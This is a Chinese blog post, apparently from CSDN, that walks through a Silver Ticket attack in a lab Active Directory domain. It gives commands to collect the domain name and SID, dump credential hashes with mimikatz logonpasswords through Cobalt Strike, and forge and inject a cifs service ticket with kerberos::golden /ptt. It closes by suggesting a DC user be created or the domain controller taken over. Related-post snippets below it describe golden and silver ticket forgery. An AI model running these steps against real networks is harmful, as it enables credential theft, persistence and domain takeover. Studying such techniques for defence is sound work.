权限维持-白银票据

最新推荐文章于 2024-02-20 00:00:17 发布
最新推荐文章于 2024-02-20 00:00:17 发布
阅读量264 收藏
点赞数 1
分类专栏: 内网 文章标签: 服务器 运维 经验分享 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64815693/article/details/130940661
版权

前言

白银票据是利用域的服务账户进行伪造ST,需要一些服务进行交互,比如cifs(共享文件服务)、mysql、sqlserver之类的,所以白银票据是没有黄金票据这么好用的,但是比白银票据更加隐藏一些。
注:限定域环境

复现

1.收集信息

还是加上我们cs上线一台域控和一个普通域内主机

首先我们还是对域控进行收集信息,首先是域名

shell net config workstation

然后查看sid的值

shell whoami /user

然后获取域的hash值,可以从这里直接执行抓取明文密码,或者直接执行命令也是可以的

logonpasswords

 然后查看密码凭证,找到我们需要的密码hash值

 2.利用

然后来到我们上线的域内普通主机上面,执行下面,需要根据自己需要和内容修改,这里我们普通主机上线的用户是webadmin,所以这里使用webadmin

//删除票据
mimikatz kerberos::purge

//生成白银票据
mimikatz kerberos::golden /user:webadmin /domain:god.org /sid:S-1-5-21-1218902331-2157346161-1782232778 /target:OWA2010CN-God.god.org /service:cifs /rc4:7e601bfe78bee3f9596ab970b903d614 /ptt

这里我们发现普通主机可以直接访问域控了,接下来的操作看自己了,是创建一个域控用户,还是直接上线域控都可以

练习两年半的篮球选..哦不对安全选手
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
物流地产行业报告-白银时代弄潮儿
03-21
物流地产行业报告-白银时代弄潮儿
2013年-2022年最新全国城市的PM2.5数据-白银.csv
06-14
2013年-2022年最新全国城市的PM2.5数据-白银.csv
黄金票据&&白银票据
最新发布
huohaowen的博客
02-20 488
今天来讲讲黄金票据&&白银票据
Android课程设计项目作业-白银数据APP的设计与实现
12-19
Android课程设计项目作业-白银数据APP的设计与实现 项目介绍 运行中有什么问题可以私聊博主,这是本人的课程设计,主页置顶有常见爆红解决的方法 ## 项目备注 1、该资源内项目代码都经过测试运行成功,功能ok的情况下才上传的,请放心下载使用! 2、本项目适合计算机相关专业(如计科、人工智能、通信工程、自动化、电子信息等)的在校学生、老师或者企业员工下载学习,也适合小白学习进阶,当然也可作为毕设项目、课程设计、作业、项目初期立项演示等。 3、如果基础还行,也可在此代码基础上进行修改,以实现其他功能,也可用于毕设、课设、作业等。 下载后请首先打开README.md文件(如有),仅供学习参考, 切勿用于商业用途。 -------- ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
白银票据的原理和使用
qq_45455136的博客
12-21 1072
白银票据的原理和使用 白银票据(Silver Ticket)原理 白银票据的使用 服务账号是计算机名字+$用来管理服务的账号 白银票据(Silver Ticket)原理 白银票据是伪造本该由TGS返回的ST(服务票据),从而访问对应的服务 有server用户的hash就可以伪造出ST,且不经过KDC,但伪造的票只对部分服务起作用,权限比黄金票据
白银票据及黄金票据的一些学习
dayouzi的博客
08-11 555
Golden Ticket(金票)是通过伪造TGT(TickerGranting Ticket),因为只要有了高权限的TGT,那么就可以发送给TGS换取任意服务的ST。可以说有了金票就有了域内的最高权限。对于攻击者来说,只要拿到了域控权限,就可以直接导出krbtgt的Hash值,再通过mimikatz即可生成任意用户任何权限的Ticket,也就是Golden Ticket。
黄金票据白银票据详解
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
06-22 4558
在 Windows 系统中,存在许多突破用户权限或绕过系统保护机制的漏洞,攻击者可以通过利用这些漏洞,提升自己的权限并获取黄金票据。​ Golden Ticket是通过伪造的TGT(由身份认证服务授予的票据,用于身份认证,存储在内存,默认有效期为10小时),因为只要有了高权限的TGT,那么就可以发送给TGS(票据授予服务)换取任意服务的ST。​ 每个用户的Ticket都是由krbtgt的密码Hash来生成的,那么,我们如果拿到了krbtgt的密码Hash,其实就可以伪造任意用户的TICKET,
权限维持(黄金票据白银票据)
qq_18811919的博客
03-19 1812
黄金票据白银票据通常被认为属于票据传递攻击(Pass-the-Ticket,简称PTT)的一种。 这是一种针对Windows身份验证系统的攻击,攻击者可以利用缺陷或弱点获取用户或系统 帐户的票据信息,然后将其用于进一步攻击或访问敏感资源本篇文章注意讲述了黄金票据白银票据的数据包分析以及如何进行PTT攻击,讲述了多种利用方式包括CS/mimikatz/Impacket等。
一文搞懂黄金白银票据
m0_75218183的博客
06-29 785
在学习黄金白银票据之前,我们先要搞懂Kerberos(三头保卫神犬)协议。Kerberos 是一种网络认证协议,其设计目标是通过密钥系统为客户机 / 服务器应用程序提供强大的认证服务。该认证过程的实现不依赖于主机操作系统的认证,无需基于主机地址的信任,不要求网络上所有主机的物理安全,并假定网络上传送的数据包可以被任意地读取、修改和插入数据。在以上情况下, Kerberos 作为一种可信任的第三方认证服务,是通过传统的密码技术(如:共享密钥)执行认证服务的。
内网渗透——黄金票据白银票据
来日可期的博客
10-11 2239
黄金票据(Golden Ticket):黄金票据指的是攻击者通过获取目标环境中域控制器(Domain Controller)上的krbtgt帐户的散列值,然后使用散列值生成伪造的票据。这种伪造的票据具有极高的权限,并且不受密码更改的影响。拥有黄金票据相当于拥有域内的最高权限,攻击者可以访问和控制所有域内资源。 白银票据(Silver Ticket):白银票据是攻击者通过获取目标环境中某个服务帐户(Service Account)的散列值,并使用散列值生成伪造的票据。这种伪造的票据允许攻击者模拟该服务账户的
域渗透之黄金票据白银票据
dys的博客
07-19 431
黄金票据白银票据 kerberos协议
2013年-2022年最新全国城市的PM2.5数据-白银.zip
06-14
2013年-2022年最新全国城市的PM2.5数据-白银
学校实训毕业商用项目-白银贵金属企业站源码.zip
09-03
学校实训毕业商用项目-白银贵金属企业站源码.zip
解析:Kerberos、黄金票据白银票据
Sgirll的博客
07-15 685
是指攻击者获取了合法用户的TGT(Ticket Granting Ticket)的信息,然后对TGT进行篡改以生成伪造的服务票据(TGS票据)。白银票据伪装成合法的TGS票据,用于访问特定的服务,但与黄金票据不同,白银票据只能访问被篡改的服务,无法获得对整个域的完全控制。服务访问:用户使用TGS票据向目标服务发送请求,目标服务使用TGS的私有秘钥解密票据并验证用户的身份。服务票据的颁发:TGS验证TGT,并为用户生成一个服务票据(TGS票据),该票据包含有关用户和目标服务的信息,并用TGS的私有秘钥加密。
权限维持-黄金/白银票据详解
yy
04-19 1896
在域环境中进行权限维持,谈的比较多的便是票据,分为白银票据和黄金票据, 其原理都是基于Kerberos认证。黄金票据伪造的是域管下发给用户的TGT,而白银票据则是伪造的 ST。
白银票据原理制作与利用
G3et的博客
01-19 274
1、如果是域普通用户,主要看防火墙,开了防火墙可能会导致dir过不去2、白银票据伪造的是ST,只能访问特定的服务,如cifs(文件共享服务)、winrm(远程管理)3、白银票据获取的是服务的hash4、白银票据不通过kdc,相对黄金票据银票更加隐蔽。
Kerberos的白银票据详解
weixin_30532987的博客
12-26 4106
0x01白银票据(Silver Tickets)定义 白银票据(Silver Tickets)是伪造Kerberos票证授予服务(TGS)的票也称为服务票据。如下图所示,与域控制器没有AS-REQ 和 AS-REP(步骤1和2),也没有TGS-REQ / TGS-REP(步骤3和4)通信。由于银票是伪造的TGS,所以没有与域控制器通信。 0x02白银票据的特点 1.白银票据...
权限维持】黄金白银票据&隐藏账户&C2远控&RustDesk&GotoHTTP
今天是几号的博客
04-10 769
第⼀次拿到域管权限之后,需要将krbtgt NTLM hash进⾏保存,当第⼆次再来进⾏域渗透攻击时,我们就可使⽤krbtgt的NTLM hash制作⻩⾦票据,从⽽再次获得域管权限。工具原理:添加用户时在用户名上添加$符号,将该用户的用户组设置为空(单主机环境为空,域环境为administrator组),导致无法删除(在注册表中也可以进行隐藏)2、域的SID值:S-1-5-21-1218902331-2157346161-1782232778。sid:域环境下的SID,除去最后-的部分剩下的内容。
用TQSDK获取期货白银价格
02-15
要获取期货白银价格,您可以使用TQSDK的API,如下所示: ```python import tqsdk # 创建TQSDK的客户端实例 tq = tqsdk.TqApi() # 订阅期货白银的价格行情 quote = tq.get_quote("SHFE.ag1912") # 获取期货白银的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

练习两年半的篮球选..哦不对安全选手

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值